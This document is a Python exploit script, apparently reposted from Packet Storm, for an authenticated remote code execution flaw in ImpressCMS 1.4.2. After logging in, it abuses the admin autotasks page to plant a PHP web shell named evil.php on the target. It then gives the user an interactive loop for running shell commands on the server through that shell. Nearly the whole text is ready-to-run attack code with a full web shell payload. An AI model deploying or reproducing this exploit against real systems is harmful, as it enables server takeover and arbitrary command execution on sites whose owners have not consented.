Share
## https://sploitus.com/exploit?id=PACKETSTORM:164174
# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)  
# Date: 15-09-2021  
# Exploit Author: Halit AKAYDIN (hLtAkydn)  
# Vendor Homepage: https://www.impresscms.org/  
# Software Link: https://www.impresscms.org/modules/downloads/  
# Version: 1.4.2  
# Category: Webapps  
# Tested on: Linux/Windows  
  
# ImpressCMS is a multilingual content management system for the web  
# Contains an endpoint that allows remote access  
# Autotask page misconfigured, causing security vulnerability  
  
  
  
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123  
  
import requests  
import argparse  
import sys  
from time import sleep  
  
session = requests.session()  
  
def main():  
parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)')  
parser.add_argument('-u', '--host', type=str, required=True)  
parser.add_argument('-l', '--login', type=str, required=True)  
parser.add_argument('-p', '--password', type=str, required=True)  
args = parser.parse_args()  
print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)",  
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")  
exploit(args)  
  
def countdown(time_sec):  
while time_sec:  
mins, secs = divmod(time_sec, 60)  
timeformat = '{:02d}'.format(secs)  
print("["+timeformat+"] The task is expected to run!", end='\r')  
sleep(1)  
time_sec -= 1  
  
def exploit(args):  
#Check http or https  
if args.host.startswith(('http://', 'https://')):  
print("[?] Check Url...\n")  
args.host = args.host  
if args.host.endswith('/'):  
args.host = args.host[:-1]  
sleep(2)  
else:  
print("\n[?] Check Adress...\n")  
args.host = "http://" + args.host  
args.host = args.host  
if args.host.endswith('/'):  
args.host = args.host[:-1]  
sleep(2)  
  
try:  
response = requests.get(args.host)  
if response.status_code != 200:  
print("[-] Address not reachable!")  
sleep(2)  
exit(1)  
except requests.ConnectionError as exception:  
print("[-] Address not reachable")  
exit(1)  
  
  
response = requests.get(args.host + "/evil.php")  
if response.status_code == 200:  
print("[*] Exploit file exists!\n")  
sleep(2)  
print("[+] Exploit Done!\n")  
  
while True:  
cmd = input("$ ")  
url = args.host + "/evil.php?cmd=" + cmd  
headers = {  
"Upgrade-Insecure-Requests": "1",  
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"  
}  
  
response = requests.post(url, headers=headers, timeout=5)  
  
if response.text == "":  
print(cmd + ": command not found\n")  
else:  
print(response.text)  
  
else:  
#Login and set cookie  
url = args.host + "/user.php"  
cookies = {  
"ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5"  
}  
  
headers = {  
"Cache-Control": "max-age=0",  
"Upgrade-Insecure-Requests": "1",  
"Origin": args.host,  
"Content-Type": "application/x-www-form-urlencoded",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",  
"Referer": args.host,  
"Accept-Encoding": "gzip, deflate",  
"Accept-Language": "en-US,en;q=0.9",  
"Connection": "close"  
}  
  
data = {  
"uname": args.login,  
"pass": args.password,  
"xoops_redirect": "/",  
"op": "login"  
}  
  
response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)  
new_cookies = session.cookies.get("ICMSSESSION")  
  
if (new_cookies is None):  
print("[-] Login Failed...\n")  
print("Your username or password is incorrect.")  
sleep(2)  
exit(1)  
else:  
print("[+] Success Login...\n")  
sleep(2)  
  
# Create Tasks  
url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod"  
cookies = {  
"ICMSSESSION": new_cookies  
}  
  
headers = {  
"Cache-Control": "max-age=0",  
"Upgrade-Insecure-Requests": "1",  
"Origin": args.host,  
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",  
"Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod",  
"Accept-Encoding": "gzip, deflate",  
"Accept-Language": "en-US,en;q=0.9",  
"Connection": "close"  
}  
  
data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"<?php system(\\x24_GET['cmd']); ?>\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n"+args.host+"/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n"  
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)  
  
if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks":  
print("[*] Task Create.\n")  
sleep(2)  
  
countdown(60)  
  
print("\n\n[+] Exploit Done!\n")  
sleep(2)  
  
while True:  
cmd = input("$ ")  
url = args.host + "/evil.php?cmd=" + cmd  
headers = {  
"Upgrade-Insecure-Requests": "1",  
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"  
}  
  
response = requests.post(url, headers=headers, timeout=5)  
if response.text == "":  
print(cmd + ": command not found\n")  
else:  
print(response.text)  
elif response.headers.get("location") == args.host + "/user.php":  
print("[!] Unauthorized user!\n\n")  
print("Requires user with create task permissions.")  
sleep(2)  
else:  
pass  
  
  
if __name__ == '__main__':  
main()